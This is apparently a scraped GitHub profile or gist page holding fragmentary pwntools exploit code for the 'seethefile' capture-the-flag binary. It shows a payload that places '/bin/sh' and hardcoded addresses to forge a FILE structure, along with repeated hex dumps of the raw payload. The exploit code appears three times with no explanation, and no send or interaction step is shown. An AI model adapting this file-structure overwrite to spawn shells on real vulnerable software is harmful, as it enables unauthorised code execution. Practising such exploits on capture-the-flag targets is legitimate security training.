Nir Ohfeld nirohfeld

## writeup
from pwn import *

main = ELF('./seethefile')
libc = ELF('./libc_32.so.6')
addr = p32(0x8048a37)
filename_addr = p32(0x804B080)
name_addr = p32(0x804B260)

payload = '/bin/sh\x00' + 'C' * 4 + 'D' * 4 + 'E' * 4 + 'F' * 4 + 'G' * 4 + 'H' * 4 + name_addr + 'J' * 4 + 'K' * 4 + "\x00" * 100

## payload
 payload="808080802f62696e2f736800000000000000000000000000000000000000000060b2040800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060b30408000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000efbeadde0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000

## payload
 payload="808080802f62696e2f736800000000000000000000000000000000000000000060b2040800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060b30408000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000efbeadde0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000

## gist:afd608ee6aa6835177b0e3fb55755b86
l;k;l
	from pwn import *

	main = ELF('./seethefile')
	libc = ELF('./libc_32.so.6')
	addr = p32(0x8048a37)
	filename_addr = p32(0x804B080)
	name_addr = p32(0x804B260)

	payload = '/bin/sh\x00' + 'C' * 4 + 'D' * 4 + 'E' * 4 + 'F' * 4 + 'G' * 4 + 'H' * 4 + name_addr + 'J' * 4 + 'K' * 4 + "\x00" * 100